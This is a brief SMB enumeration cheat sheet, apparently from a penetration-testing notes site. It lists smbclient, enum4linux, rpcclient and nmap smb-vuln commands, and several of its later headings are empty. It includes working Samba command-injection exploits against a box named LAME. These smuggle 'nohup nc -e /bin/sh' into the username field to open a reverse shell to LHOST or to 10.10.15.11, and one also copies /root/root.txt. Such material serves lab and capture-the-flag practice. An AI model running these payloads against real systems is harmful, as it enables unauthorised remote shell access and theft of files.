SMB Enumeration

SMB Tools

smbclient -L x.x.x.x
smbmount //x.x.x.x/share /mnt –o username=hodor,workgroup=hodor
smbclient \\\\x.x.x.x\\share
enum4linux -a ip
rpcclient -U "" x.x.x.x  #Anonymous bind using rpcclient / Null connect
smbclient //MOUNT/share #Connect to SMB share

smbclient -U "/=\`nohup nc -e /bin/sh LHOST LPORT\`" -N -I ip //LAME/tmp

nmap -T4 -sS -sC -Pn -A --script smb-vuln* ip
smbclient //ip/tmp
logon "./=`nohup nc -e /bin/sh LHOST LPORT`"

smbclient -U "/=\`nohup cat /root/root.txt > /tmp/ttt\`" -N -I ip //LAME/tmp

smbclient -U "/=\`nohup nc -e /bin/sh 10.10.15.11 60000\`" -N -I ip //LAME/tmp

smbclient -L ip
enum4linux -S ip


Nmap SMB Script Scan

Mounting File Share

Mounting Share folder

Create a SMB Server

Last updated

Was this helpful?